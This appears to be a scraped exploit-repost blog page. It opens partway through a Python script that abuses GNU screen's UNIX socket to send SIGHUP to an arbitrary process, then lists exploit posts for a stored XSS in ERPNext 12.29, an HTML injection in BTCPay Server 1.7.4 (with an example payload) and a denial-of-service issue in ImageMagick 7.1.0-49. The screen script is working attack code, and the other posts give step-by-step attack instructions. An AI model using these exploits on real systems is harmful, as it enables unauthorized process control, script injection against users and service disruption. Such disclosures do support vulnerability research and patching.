parser.add_argument('pid', type=int, help='the pid to receive the signal') args = parser.parse_args() pid = args.pid username = os.getlogin() screen = spawn_screen_instance() print("Waiting a second for screen to setup its socket..") time.sleep(1) s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username)) print(f"Connecting to: {socket_path}") s.connect(socket_path) print('Sending message...') msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D") s.sendmsg([msg]) s.recv(512) print(f'Ok sent SIGHUP to {pid}!') screen.kill() if __name__ == '__main__': main()
  23. HireHackking

    ERPNext 12.29 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS) # Date: 7 Feb 2023 # Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla #Github - https://github.com/patrickdeanramos/CVE-2022-28598 # Vendor Homepage: https://erpnext.com/ # Version: 12.29 # CVE-2022-28598 Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the "last_known_version" field found in the "My Setting" page in ERPNext 12.29.0 allows remote attackers to inject arbitrary web script or HTML via a crafted site name by doing an authenticated POST HTTP request to '/desk#Form/User/(Authenticated User)' and inject the script in the 'last_known_version' field where we are able to view the script by clicking the 'pdf' view form. This vulnerability is specifically the "last_known_version" field found under the 'My Settings' where we need to first save the my settings. 1. Login as any user 2. Under the ‘last_known_version’ field we are going to inject our malicious script. 3. To view our injected script we need to click the view pdf page, and as seen below we have successfully injected our script.
  24. HireHackking

    BTCPay Server v1.7.4 - HTML Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: BTCPay Server v1.7.4 - HTML Injection # Date: 01/26/2023 # Exploit Author: Manojkumar J (TheWhiteEvil) # Vendor Homepage: https://github.com/btcpayserver/btcpayserver # Software Link: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5 # Version: <=1.7.4 # Tested on: Windows10 # CVE : CVE-2023-0493 # Description: BTCPay Server v1.7.4 HTML injection vulnerability. # Steps to exploit: 1. Create an account on the target website. Register endpoint: https://target-website.com/register# 2. Move on to the API key and create API key with the html injection in the label field. Example: <a href="https://hackerbro.in">clickhere</a> 3. Click remove/delete API key, the html injection will render.
  25. HireHackking

    ImageMagick 7.1.0-49 - DoS

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: ImageMagick 7.1.0-49 - DoS ## Author: nu11secur1ty ## Date: 02.07.2023 ## Vendor: https://imagemagick.org/ ## Software: https://imagemagick.en.uptodown.com/windows/download/82953605 ## Reference: https://portswigger.net/daily-swig/denial-of-service ## CVE-ID: CVE-2022-44267 ## Description: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input. The attacker can easily send a malicious png file to the victim and then when the victim has opened this png he will crash the program. STATUS: HIGH Vulnerability [+]Payload: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC) ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267) ## Proof and Exploit: [href](https://streamable.com/l7z79c) ## Time spend: 00:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>